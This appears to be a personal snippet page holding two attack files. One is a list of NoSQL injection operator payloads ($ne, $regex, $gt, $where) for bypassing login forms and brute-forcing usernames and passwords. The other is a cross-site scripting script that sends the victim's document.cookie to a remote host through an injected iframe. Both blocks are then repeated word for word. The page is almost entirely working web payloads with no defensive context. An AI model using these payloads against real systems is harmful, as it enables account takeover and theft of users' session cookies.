Gajendra Mahato NoobGajen

## NoSQLi-login-bypass.txt
Bypass with Operator:
username[$ne]=1$password[$ne]=1 #<Not Equals>
username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
username[$eq]=admin$password[$ne]=1 #<Equals>
username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
username[$ne]=admin&pass[$gt]=s #<Greater Than>
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code

## xss.js
<script type="text/javascript">
document.write("<iframe src='http://remotehost/whatever.ok?cookie="+document.cookie+"'></iframe>");
</script>
	Bypass with Operator:
	username[$ne]=1$password[$ne]=1 #<Not Equals>
	username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameter
	username[$regex]=.{25}&pass[$ne]=1 #Use the <regex> to find the length of a value
	username[$eq]=admin$password[$ne]=1 #<Equals>
	username[$ne]=admin&pass[$lt]=s #<Less than>, Brute-force pass[$lt] to find more users
	username[$ne]=admin&pass[$gt]=s #<Greater Than>
	username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7 #<Matches non of the values of the array> (not test and not admin)
	{ $where: "this.credits == this.debits" }#<IF>, can be used to execute code
	<script type="text/javascript">
	document.write("<iframe src='http://remotehost/whatever.ok?cookie="+document.cookie+"'></iframe>");
	</script>